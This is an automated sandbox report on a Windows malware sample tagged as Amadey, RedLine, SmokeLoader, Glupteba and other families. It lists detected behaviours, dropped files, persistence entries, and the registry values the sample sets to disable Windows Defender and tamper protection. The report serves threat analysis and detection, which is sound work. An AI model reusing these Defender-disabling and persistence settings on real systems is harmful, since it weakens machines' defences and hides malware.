Malware Analysis Report

2025-01-23 10:16

Sample ID 231010-ysfrsagf8z
Target da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c
SHA256 da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c
Tags
amadey dcrat glupteba healer mystic redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c

Threat Level: Known bad

The file da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer mystic redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

SectopRAT payload

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

RedLine payload

Windows security bypass

Mystic

Glupteba payload

SmokeLoader

Glupteba

SectopRAT

Modifies Windows Defender Real-time Protection settings

DcRat

Healer

RedLine

Amadey

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Stops running service(s)

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

Windows security modification

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Manipulates WinMon driver.

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Suspicious behavior: LoadsDriver

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:02

Reported

2023-10-10 20:06

Platform

win10v2004-20230915-en

Max time kernel

151s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C8EF.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CF8A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C17.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4248824.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0070557.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3174991.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C4C7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C6DB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C8EF.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CB52.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2BY150Kr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CF8A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C17.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\322E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3432.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\322E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\322E.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\CD18.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da66fedd7831c720e47597fda2295ebcb868479b9c21bc86646c523b99e3233c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7002600.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\C4C7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-492 = "India Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
